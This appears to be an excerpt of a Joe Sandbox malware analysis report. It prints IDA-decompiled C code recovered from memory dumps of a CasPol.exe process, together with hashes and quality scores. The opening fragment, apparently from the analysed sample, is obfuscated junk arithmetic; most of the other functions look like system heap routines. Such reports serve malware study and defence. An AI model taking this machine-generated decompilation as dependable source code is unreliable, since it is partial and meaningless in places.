                                                                				 *0x594bd41b =  *0x594bd41b << 0x8f;
                                                                				asm("movsw");
                                                                				__eflags =  *0x4b8dce5 & __al;
                                                                				 *0x940d543e =  *0x940d543e ^ 0x0456500e;
                                                                				asm("movsb");
                                                                				asm("rcr dword [0x418de92], 0x8a");
                                                                				__edx = __edx | 0xfa9dea65;
                                                                				__ebp = 0x52eda39f;
                                                                				asm("rcl dword [0xc12212d], 0xe4");
                                                                				asm("adc ecx, [0x7e02cdce]");
                                                                				asm("stosd");
                                                                				__eflags = __edi -  *0xe307b4c2;
                                                                				return  *0xfaa4f03;
                                                                			}










                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 94%
                                                                			E01638A0A(intOrPtr* __ecx, signed int __edx) {
                                                                				signed int _v8;
                                                                				char _v524;
                                                                				signed int _v528;
                                                                				void* _v532;
                                                                				char _v536;
                                                                				char _v540;
                                                                				char _v544;
                                                                				intOrPtr* _v548;
                                                                				void* __ebx;
                                                                				void* __edi;
                                                                				void* __esi;
                                                                				signed int _t44;
                                                                				void* _t46;
                                                                				void* _t48;
                                                                				signed int _t53;
                                                                				signed int _t55;
                                                                				intOrPtr* _t62;
                                                                				void* _t63;
                                                                				unsigned int _t75;
                                                                				signed int _t79;
                                                                				unsigned int _t81;
                                                                				unsigned int _t83;
                                                                				signed int _t84;
                                                                				void* _t87;
                                                                
                                                                				_t76 = __edx;
                                                                				_v8 =  *0x171d360 ^ _t84;
                                                                				_v536 = 0x200;
                                                                				_t79 = 0;
                                                                				_v548 = __edx;
                                                                				_v544 = 0;
                                                                				_t62 = __ecx;
                                                                				_v540 = 0;
                                                                				_v532 =  &_v524;
                                                                				if(__edx == 0 || __ecx == 0) {
                                                                					L6:
                                                                					return E0166B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
                                                                				} else {
                                                                					_v528 = 0;
                                                                					E0163E9C0(1, __ecx, 0, 0,  &_v528);
                                                                					_t44 = _v528;
                                                                					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
                                                                					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
                                                                					_t46 = 0xa;
                                                                					_t87 = _t81 - _t46;
                                                                					if(_t87 > 0 || _t87 == 0) {
                                                                						 *_v548 = 0x1601180;
                                                                						L5:
                                                                						_t79 = 1;
                                                                						goto L6;
                                                                					} else {
                                                                						_t48 = E01651DB5(_t62,  &_v532,  &_v536);
                                                                						_t76 = _v528;
                                                                						if(_t48 == 0) {
                                                                							L9:
                                                                							E01663C2A(_t81, _t76,  &_v544);
                                                                							 *_v548 = _v544;
                                                                							goto L5;
                                                                						}
                                                                						_t62 = _v532;
                                                                						if(_t62 != 0) {
                                                                							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
                                                                							_t53 =  *_t62;
                                                                							_v528 = _t53;
                                                                							if(_t53 != 0) {
                                                                								_t63 = _t62 + 4;
                                                                								_t55 = _v528;
                                                                								do {
                                                                									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
                                                                										if(E01638999(_t63,  &_v540) == 0) {
                                                                											_t55 = _v528;
                                                                										} else {
                                                                											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
                                                                											_t55 = _v528;
                                                                											if(_t75 >= _t83) {
                                                                												_t83 = _t75;
                                                                											}
                                                                										}
                                                                									}
                                                                									_t63 = _t63 + 0x14;
                                                                									_t55 = _t55 - 1;
                                                                									_v528 = _t55;
                                                                								} while (_t55 != 0);
                                                                								_t62 = _v532;
                                                                							}
                                                                							if(_t62 !=  &_v524) {
                                                                								L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
                                                                							}
                                                                							_t76 = _t83 & 0x0000ffff;
                                                                							_t81 = _t83 >> 0x10;
                                                                						}
                                                                						goto L9;
                                                                					}
                                                                				}
                                                                			}




























                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E016EAA16(void* __ecx, intOrPtr __edx, signed int _a4, short _a8) {
                                                                				intOrPtr _v8;
                                                                				char _v12;
                                                                				signed int _v16;
                                                                				signed char _v20;
                                                                				intOrPtr _v24;
                                                                				char* _t37;
                                                                				void* _t47;
                                                                				signed char _t51;
                                                                				void* _t53;
                                                                				char _t55;
                                                                				intOrPtr _t57;
                                                                				signed char _t61;
                                                                				intOrPtr _t75;
                                                                				void* _t76;
                                                                				signed int _t81;
                                                                				intOrPtr _t82;
                                                                
                                                                				_t53 = __ecx;
                                                                				_t55 = 0;
                                                                				_v20 = _v20 & 0;
                                                                				_t75 = __edx;
                                                                				_t81 = ( *(__ecx + 0xc) | _a4) & 0x93000f0b;
                                                                				_v24 = __edx;
                                                                				_v12 = 0;
                                                                				if((_t81 & 0x01000000) != 0) {
                                                                					L5:
                                                                					if(_a8 != 0) {
                                                                						_t81 = _t81 | 0x00000008;
                                                                					}
                                                                					_t57 = E016EABF4(_t55 + _t75, _t81);
                                                                					_v8 = _t57;
                                                                					if(_t57 < _t75 || _t75 > 0x7fffffff) {
                                                                						_t76 = 0;
                                                                						_v16 = _v16 & 0;
                                                                					} else {
                                                                						_t59 = _t53;
                                                                						_t76 = E016EAB54(_t53, _t75, _t57, _t81 & 0x13000003,  &_v16);
                                                                						if(_t76 != 0 && (_t81 & 0x30000f08) != 0) {
                                                                							_t47 = E016EAC78(_t53, _t76, _v24, _t59, _v12, _t81, _a8);
                                                                							_t61 = _v20;
                                                                							if(_t61 != 0) {
                                                                								 *(_t47 + 2) =  *(_t47 + 2) ^ ( *(_t47 + 2) ^ _t61) & 0x0000000f;
                                                                								if(E016CCB1E(_t61, _t53, _t76, 2, _t47 + 8) < 0) {
                                                                									L016477F0(_t53, 0, _t76);
                                                                									_t76 = 0;
                                                                								}
                                                                							}
                                                                						}
                                                                					}
                                                                					_t82 = _v8;
                                                                					L16:
                                                                					if(E01647D50() == 0) {
                                                                						_t37 = 0x7ffe0380;
                                                                					} else {
                                                                						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                					}
                                                                					if( *_t37 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                                						E016E131B(_t53, _t76, _t82, _v16);
                                                                					}
                                                                					return _t76;
                                                                				}
                                                                				_t51 =  *(__ecx + 0x20);
                                                                				_v20 = _t51;
                                                                				if(_t51 == 0) {
                                                                					goto L5;
                                                                				}
                                                                				_t81 = _t81 | 0x00000008;
                                                                				if(E016CCB1E(_t51, __ecx, 0, 1,  &_v12) >= 0) {
                                                                					_t55 = _v12;
                                                                					goto L5;
                                                                				} else {
                                                                					_t82 = 0;
                                                                					_t76 = 0;
                                                                					_v16 = _v16 & 0;
                                                                					goto L16;
                                                                				}
                                                                			}




















                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                                                • Instruction ID: d905ec8cbeff43a9b9f6f9923ad8b56791300c0f4e537305ca6917afad5e6813
                                                                • Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                                                • Instruction Fuzzy Hash: 4131E332B01205ABEF159AA9CD89BBFFBEBEF80610F05456DE905A7391EB748D01C650
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E016F22AE(unsigned int* __ecx, intOrPtr __edx, void* __eflags, signed int _a4, signed int _a8, char* _a12) {
                                                                				signed int _v8;
                                                                				signed int _v12;
                                                                				signed char _v16;
                                                                				signed int _v20;
                                                                				intOrPtr _v24;
                                                                				intOrPtr _v36;
                                                                				void* __ebx;
                                                                				void* __edi;
                                                                				signed char _t50;
                                                                				signed int _t53;
                                                                				signed char _t63;
                                                                				signed char _t71;
                                                                				signed char _t75;
                                                                				signed int _t77;
                                                                				unsigned int _t106;
                                                                				unsigned int* _t114;
                                                                				signed int _t117;
                                                                
                                                                				_v20 = _v20 & 0x00000000;
                                                                				_t117 = _a4;
                                                                				_t114 = __ecx;
                                                                				_v24 = __edx;
                                                                				E016F21E8(_t117, __edx,  &_v16,  &_v12);
                                                                				if(_v24 != 0 && (_v12 | _v8) != 0) {
                                                                					_t71 =  !_v8;
                                                                					_v16 =  !_v12 >> 8 >> 8;
                                                                					_t72 = _t71 >> 8;
                                                                					_t50 = _v16;
                                                                					_t20 = (_t50 >> 8) + 0x160ac00; // 0x6070708
                                                                					_t75 = ( *((intOrPtr*)((_t71 >> 8 >> 8 >> 8) + 0x160ac00)) +  *((intOrPtr*)((_t71 >> 0x00000008 >> 0x00000008 & 0x000000ff) + 0x160ac00)) +  *((intOrPtr*)((_t71 & 0x000000ff) + 0x160ac00)) +  *((intOrPtr*)((_t72 & 0x000000ff) + 0x160ac00)) & 0x000000ff) + ( *_t20 +  *((intOrPtr*)((_t50 & 0x000000ff) + 0x160ac00)) +  *((intOrPtr*)((_t71 & 0x000000ff) + 0x160ac00)) +  *((intOrPtr*)((_t72 & 0x000000ff) + 0x160ac00)) & 0x000000ff);
                                                                					_v16 = _t75;
                                                                					if(( *(__ecx + 0x38) & 0x00000002) != 0) {
                                                                						L6:
                                                                						_t53 =  *0x1716110; // 0x3951a168
                                                                						 *_t117 = ( !_t53 ^  *_t117 ^ _t117) & 0x7fffffff ^  !_t53 ^ _t117;
                                                                						 *(_t117 + 4) = (_t117 - _v24 >> 0x0000000c ^  *0x1716110 ^ _t117) & 0x000000ff | 0x00000200;
                                                                						_t77 = _a8 & 0x00000001;
                                                                						if(_t77 == 0) {
                                                                							E0163FFB0(_t77, _t114, _t114);
                                                                						}
                                                                						_t63 = E016F2FBD(_t114, _v24, _v12, _v8, _v16, 0);
                                                                						_v36 = 1;
                                                                						if(_t77 == 0) {
                                                                							E01642280(_t63, _t114);
                                                                						}
                                                                						 *(_t117 + 4) =  *(_t117 + 4) & 0xfffffdff;
                                                                						 *_a12 = 0xff;
                                                                					} else {
                                                                						_t106 =  *(__ecx + 0x18) >> 7;
                                                                						if(_t106 <= 8) {
                                                                							_t106 = 8;
                                                                						}
                                                                						if( *((intOrPtr*)(_t114 + 0x1c)) + _t75 > _t106) {
                                                                							goto L6;
                                                                						}
                                                                					}
                                                                				}
                                                                				return _v20;
                                                                			}





















                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 694893955c51dd5039ad3e7fb10ef3992302fa5fb4795e70ddde11547ca84d60
                                                                • Instruction ID: 2c4f900498172cc6f0e010beebe59d831b6538da878b8ca31266efca68b96f8c
                                                                • Opcode Fuzzy Hash: 694893955c51dd5039ad3e7fb10ef3992302fa5fb4795e70ddde11547ca84d60
                                                                • Instruction Fuzzy Hash: 0441E3B12183424BD305CF69CCA5A7BBBE1EF95225F06465DF5D58B382CB34D809CBA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 76%
                                                                			E016EFDE2(signed int* __ecx, signed int __edx, signed int _a4) {
                                                                				char _v8;
                                                                				signed int _v12;
                                                                				signed int _t29;
                                                                				char* _t32;
                                                                				char* _t43;
                                                                				signed int _t80;
                                                                				signed int* _t84;
                                                                
                                                                				_push(__ecx);
                                                                				_push(__ecx);
                                                                				_t56 = __edx;
                                                                				_t84 = __ecx;
                                                                				_t80 = E016EFD4E(__ecx, __edx);
                                                                				_v12 = _t80;
                                                                				if(_t80 != 0) {
                                                                					_t29 =  *__ecx & _t80;
                                                                					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
                                                                					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
                                                                						E016F0A13(__ecx, _t80, 0, _a4);
                                                                						_t80 = 1;
                                                                						if(E01647D50() == 0) {
                                                                							_t32 = 0x7ffe0380;
                                                                						} else {
                                                                							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                						}
                                                                						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                                							_push(3);
                                                                							L21:
                                                                							E016E1608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
                                                                						}
                                                                						goto L22;
                                                                					}
                                                                					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
                                                                						_t80 = E016F2B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
                                                                						if(_t80 != 0) {
                                                                							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
                                                                							_t77 = _v8;
                                                                							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
                                                                								E016EC8F7(_t66, _t77, 0);
                                                                							}
                                                                						}
                                                                					} else {
                                                                						_t80 = E016EDBD2(__ecx[0xb], _t74, __edx, _a4);
                                                                					}
                                                                					if(E01647D50() == 0) {
                                                                						_t43 = 0x7ffe0380;
                                                                					} else {
                                                                						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                					}
                                                                					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
                                                                						goto L22;
                                                                					} else {
                                                                						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
                                                                						goto L21;
                                                                					}
                                                                				} else {
                                                                					_push(__ecx);
                                                                					_push(_t80);
                                                                					E016EA80D(__ecx[0xf], 9, __edx, _t80);
                                                                					L22:
                                                                					return _t80;
                                                                				}
                                                                			}











                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                                • Instruction ID: f27ecb40c104a5a577336a865870d509ffc6aa67bf1cf3a5cfc5d4798ec9a4d1
                                                                • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                                • Instruction Fuzzy Hash: AD31F8322016416FD7229B6CCC4CF6A7BEAEBC5650F184698E5458B382DBB4EC41C754
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 94%
                                                                			E016F20A8(intOrPtr __ecx, intOrPtr __edx, signed int _a4, signed int* _a8) {
                                                                				intOrPtr _v8;
                                                                				intOrPtr _v12;
                                                                				signed int _v16;
                                                                				signed int _v20;
                                                                				signed int _t35;
                                                                				signed int _t57;
                                                                				unsigned int _t61;
                                                                				signed int _t63;
                                                                				signed int _t64;
                                                                				signed int _t73;
                                                                				signed int _t77;
                                                                				signed int _t80;
                                                                				signed int _t83;
                                                                				signed int _t84;
                                                                				unsigned int _t92;
                                                                				unsigned int _t97;
                                                                				signed int _t100;
                                                                				unsigned int _t102;
                                                                
                                                                				_t79 = __edx;
                                                                				_t35 =  *0x1716110; // 0x3951a168
                                                                				_t57 = _a4;
                                                                				_v8 = __ecx;
                                                                				_t84 =  *_t57;
                                                                				_v12 = __edx;
                                                                				_t61 = _t84 ^ _t35 ^ _t57;
                                                                				_t83 = _t61 >> 0x00000001 & 0x00007fff;
                                                                				_v20 = _t83;
                                                                				 *_t57 = (_t84 ^ _t35 ^ _t57) & 0x7fffffff ^ _t35 ^ _t57;
                                                                				_t63 = _t61 >> 0x00000010 & 0x00007fff;
                                                                				if(_t63 != 0) {
                                                                					_t100 =  *0x1716110; // 0x3951a168
                                                                					_t77 = _t57 - (_t63 << 3);
                                                                					_v16 = _t77;
                                                                					_t102 = _t100 ^ _t77 ^  *_t77;
                                                                					_t106 = _t102;
                                                                					if(_t102 >= 0) {
                                                                						E016F2E3F(_v8, __edx, _t106, _t77);
                                                                						_t57 = _v16;
                                                                						_t79 = _v12;
                                                                						_t83 = _t83 + (_t102 >> 0x00000001 & 0x00007fff);
                                                                					}
                                                                				}
                                                                				_t64 = _t57 + _t83 * 8;
                                                                				if(_t64 < _t79 + (( *(_t79 + 0x14) & 0x0000ffff) + 3) * 8) {
                                                                					asm("lfence");
                                                                					_t97 =  *_t64 ^  *0x1716110 ^ _t64;
                                                                					_t109 = _t97;
                                                                					if(_t97 >= 0) {
                                                                						E016F2E3F(_v8, _t79, _t109, _t64);
                                                                						_t79 = _v12;
                                                                						_t83 = _t83 + (_t97 >> 0x00000001 & 0x00007fff);
                                                                					}
                                                                				}
                                                                				if(( *(_v8 + 0x38) & 0x00000001) != 0) {
                                                                					_t73 = _t57 + _t83 * 8;
                                                                					if(_t73 < _t79 + (( *(_t79 + 0x14) & 0x0000ffff) + 3) * 8) {
                                                                						asm("lfence");
                                                                						_t92 =  *_t73 ^  *0x1716110 ^ _t73;
                                                                						_t113 = _t92;
                                                                						if(_t92 >= 0) {
                                                                							E016F2E3F(_v8, _t79, _t113, _t73);
                                                                							_t83 = _t83 + (_t92 >> 0x00000001 & 0x00007fff);
                                                                						}
                                                                					}
                                                                				}
                                                                				if(_v20 != _t83) {
                                                                					_t66 = _v12;
                                                                					_t80 = _t57 + _t83 * 8;
                                                                					 *_t57 =  *_t57 ^ (_t83 + _t83 ^  *_t57 ^  *0x1716110 ^ _t57) & 0x0000fffe;
                                                                					if(_t80 < _v12 + (( *(_t66 + 0x14) & 0x0000ffff) + 3) * 8) {
                                                                						 *_t80 =  *_t80 ^ (_t83 << 0x00000010 ^  *_t80 ^  *0x1716110 ^ _t80) & 0x7fff0000;
                                                                					}
                                                                				}
                                                                				 *_a8 = _t83;
                                                                				return _t57;
                                                                			}






















                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f442d83b926a5808712c273f19560dc9fb05f8e94702292cabcb81b77a91a82f
                                                                • Instruction ID: e37173efca9a557616963e1d50ee87fd650c74c7071581fc56fb43efad42e47d
                                                                • Opcode Fuzzy Hash: f442d83b926a5808712c273f19560dc9fb05f8e94702292cabcb81b77a91a82f
                                                                • Instruction Fuzzy Hash: C1410373E0002A8BCB18CF68C8A147AF7F2FF4830575642BDDA05AB295DB34AD41CB94
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E016F2D07(void* __ecx, void* __edx, void* __eflags, signed short _a4) {
                                                                				char _v5;
                                                                				signed char _v12;
                                                                				signed int _v16;
                                                                				signed int _v20;
                                                                				signed int* _v24;
                                                                				signed int _t34;
                                                                				signed char _t40;
                                                                				signed int* _t49;
                                                                				signed int _t55;
                                                                				signed char _t57;
                                                                				signed char _t58;
                                                                				signed char _t59;
                                                                				signed short _t60;
                                                                				unsigned int _t66;
                                                                				unsigned int _t71;
                                                                				signed int _t77;
                                                                				signed char _t83;
                                                                				signed char _t84;
                                                                				signed int _t91;
                                                                				signed int _t93;
                                                                				signed int _t96;
                                                                
                                                                				_t34 = E016F21E8(_a4, __edx,  &_v24,  &_v20);
                                                                				_t83 =  !_v20;
                                                                				_t57 =  !_v16;
                                                                				_t84 = _t83 >> 8;
                                                                				_v12 = _t84 >> 8;
                                                                				_v5 =  *((intOrPtr*)((_t83 & 0x000000ff) + 0x160ac00)) +  *((intOrPtr*)((_t84 & 0x000000ff) + 0x160ac00));
                                                                				_t58 = _t57 >> 8;
                                                                				_t59 = _t58 >> 8;
                                                                				_t66 = _t59 >> 8;
                                                                				_t60 = _a4;
                                                                				_t13 = _t66 + 0x160ac00; // 0x6070708
                                                                				_t40 = _v12;
                                                                				_t71 = _t40 >> 8;
                                                                				_v12 = 0;
                                                                				_t17 = _t71 + 0x160ac00; // 0x6070708
                                                                				 *((intOrPtr*)(__ecx + 0x1c)) =  *((intOrPtr*)(__ecx + 0x1c)) + ( *_t13 +  *((intOrPtr*)((_t59 & 0x000000ff) + 0x160ac00)) +  *((intOrPtr*)((_t57 & 0x000000ff) + 0x160ac00)) +  *((intOrPtr*)((_t58 & 0x000000ff) + 0x160ac00)) & 0x000000ff) + ( *_t17 +  *((intOrPtr*)((_t40 & 0x000000ff) + 0x160ac00)) + _v5 & 0x000000ff);
                                                                				 *_t60 =  *_t60 ^ ( *_t60 ^  *0x1716110 ^ _t34 ^ _t60) & 0x00000001;
                                                                				_t49 = __ecx + 8;
                                                                				_t77 =  *_t60 & 0x0000ffff ^ _t60 & 0x0000ffff ^  *0x1716110 & 0x0000ffff;
                                                                				_t91 =  *_t49;
                                                                				_t96 = _t49[1] & 1;
                                                                				_v24 = _t49;
                                                                				if(_t91 != 0) {
                                                                					_t93 = _t77;
                                                                					L2:
                                                                					while(1) {
                                                                						if(_t93 < (_t91 - 0x00000004 & 0x0000ffff ^  *(_t91 - 4) & 0x0000ffff ^  *0x1716110 & 0x0000ffff)) {
                                                                							_t55 =  *_t91;
                                                                							if(_t96 == 0) {
                                                                								L11:
                                                                								if(_t55 == 0) {
                                                                									goto L13;
                                                                								} else {
                                                                									goto L12;
                                                                								}
                                                                							} else {
                                                                								if(_t55 == 0) {
                                                                									L13:
                                                                									_v12 = 0;
                                                                								} else {
                                                                									_t55 = _t55 ^ _t91;
                                                                									goto L11;
                                                                								}
                                                                							}
                                                                						} else {
                                                                							_t55 =  *(_t91 + 4);
                                                                							if(_t96 == 0) {
                                                                								L6:
                                                                								if(_t55 != 0) {
                                                                									L12:
                                                                									_t91 = _t55;
                                                                									continue;
                                                                								} else {
                                                                									goto L7;
                                                                								}
                                                                							} else {
                                                                								if(_t55 == 0) {
                                                                									L7:
                                                                									_v12 = 1;
                                                                								} else {
                                                                									_t55 = _t55 ^ _t91;
                                                                									goto L6;
                                                                								}
                                                                							}
                                                                						}
                                                                						goto L14;
                                                                					}
                                                                				}
                                                                				L14:
                                                                				_t29 = _t60 + 4; // 0x4
                                                                				return E0163B090(_v24, _t91, _v12, _t29);
                                                                			}

























                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 76b8ea77b1967d23121844d942ee949f261716c4c7d0e8a8764a5475bab6df70
                                                                • Instruction ID: 49ac2cf3a4339a3f54f918bec6dae1066f1f74732f053ad89a577dee106f971a
                                                                • Opcode Fuzzy Hash: 76b8ea77b1967d23121844d942ee949f261716c4c7d0e8a8764a5475bab6df70
                                                                • Instruction Fuzzy Hash: AE412CB1A002554FC715CF69CCA0ABBBFF5EF85211B1A81AEE981DB382DA34D546C770
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 70%
                                                                			E016EEA55(intOrPtr* __ecx, char __edx, signed int _a4) {
                                                                				signed int _v8;
                                                                				char _v12;
                                                                				intOrPtr _v15;
                                                                				char _v16;
                                                                				intOrPtr _v19;
                                                                				void* _v28;
                                                                				intOrPtr _v36;
                                                                				void* __ebx;
                                                                				void* __edi;
                                                                				signed char _t26;
                                                                				signed int _t27;
                                                                				char* _t40;
                                                                				unsigned int* _t50;
                                                                				intOrPtr* _t58;
                                                                				unsigned int _t59;
                                                                				char _t75;
                                                                				signed int _t86;
                                                                				intOrPtr _t88;
                                                                				intOrPtr* _t91;
                                                                
                                                                				_t75 = __edx;
                                                                				_t91 = __ecx;
                                                                				_v12 = __edx;
                                                                				_t50 = __ecx + 0x30;
                                                                				_t86 = _a4 & 0x00000001;
                                                                				if(_t86 == 0) {
                                                                					E01642280(_t26, _t50);
                                                                					_t75 = _v16;
                                                                				}
                                                                				_t58 = _t91;
                                                                				_t27 = E016EE815(_t58, _t75);
                                                                				_v8 = _t27;
                                                                				if(_t27 != 0) {
                                                                					E0162F900(_t91 + 0x34, _t27);
                                                                					if(_t86 == 0) {
                                                                						E0163FFB0(_t50, _t86, _t50);
                                                                					}
                                                                					_push( *((intOrPtr*)(_t91 + 4)));
                                                                					_push( *_t91);
                                                                					_t59 =  *(_v8 + 0x10);
                                                                					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
                                                                					_push(0x8000);
                                                                					_t11 = _t53 - 1; // 0x0
                                                                					_t12 = _t53 - 1; // 0x0
                                                                					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
                                                                					E016EAFDE( &_v12,  &_v16);
                                                                					asm("lock xadd [eax], ecx");
                                                                					asm("lock xadd [eax], ecx");
                                                                					E016EBCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
                                                                					_t55 = _v36;
                                                                					_t88 = _v36;
                                                                					if(E01647D50() == 0) {
                                                                						_t40 = 0x7ffe0388;
                                                                					} else {
                                                                						_t55 = _v19;
                                                                						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                					}
                                                                					if( *_t40 != 0) {
                                                                						E016DFE3F(_t55, _t91, _v15, _t55);
                                                                					}
                                                                				} else {
                                                                					if(_t86 == 0) {
                                                                						E0163FFB0(_t50, _t86, _t50);
                                                                						_t75 = _v16;
                                                                					}
                                                                					_push(_t58);
                                                                					_t88 = 0;
                                                                					_push(0);
                                                                					E016EA80D(_t91, 8, _t75, 0);
                                                                				}
                                                                				return _t88;
                                                                 			}

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                                • Instruction ID: 4d14273f5d3b48e9eb76107195d4a649d9c24e9da3a823b9ae10b60955a32e35
                                                                • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                                • Instruction Fuzzy Hash: 2A31A3726057069BC719DF28CC84A5BB7EAFBC0610F044A2DF95687785DB31E805CBA5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 69%
                                                                			E016A69A6(signed short* __ecx, void* __eflags) {
                                                                				signed int _v8;
                                                                				signed int _v16;
                                                                				intOrPtr _v20;
                                                                				signed int _v24;
                                                                				signed short _v28;
                                                                				signed int _v32;
                                                                				intOrPtr _v36;
                                                                				signed int _v40;
                                                                				char* _v44;
                                                                				signed int _v48;
                                                                				intOrPtr _v52;
                                                                				signed int _v56;
                                                                				char _v60;
                                                                				signed int _v64;
                                                                				char _v68;
                                                                				char _v72;
                                                                				signed short* _v76;
                                                                				signed int _v80;
                                                                				char _v84;
                                                                				void* __ebx;
                                                                				void* __edi;
                                                                				void* __esi;
                                                                				void* _t68;
                                                                				intOrPtr _t73;
                                                                				signed short* _t74;
                                                                				void* _t77;
                                                                				void* _t78;
                                                                				signed int _t79;
                                                                				signed int _t80;
                                                                
                                                                				_v8 =  *0x171d360 ^ _t80;
                                                                				_t75 = 0x100;
                                                                				_v64 = _v64 & 0x00000000;
                                                                				_v76 = __ecx;
                                                                				_t79 = 0;
                                                                				_t68 = 0;
                                                                				_v72 = 1;
                                                                				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
                                                                				_t77 = 0;
                                                                				if(L01636C59(__ecx[2], 0x100, __eflags) != 0) {
                                                                					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
                                                                					if(_t79 != 0 && E016A6BA3() != 0) {
                                                                						_push(0);
                                                                						_push(0);
                                                                						_push(0);
                                                                						_push(0x1f0003);
                                                                						_push( &_v64);
                                                                						if(E01669980() >= 0) {
                                                                							E01642280(_t56, 0x1718778);
                                                                							_t77 = 1;
                                                                							_t68 = 1;
                                                                							if( *0x1718774 == 0) {
                                                                								asm("cdq");
                                                                								 *(_t79 + 0xf70) = _v64;
                                                                								 *(_t79 + 0xf74) = 0x100;
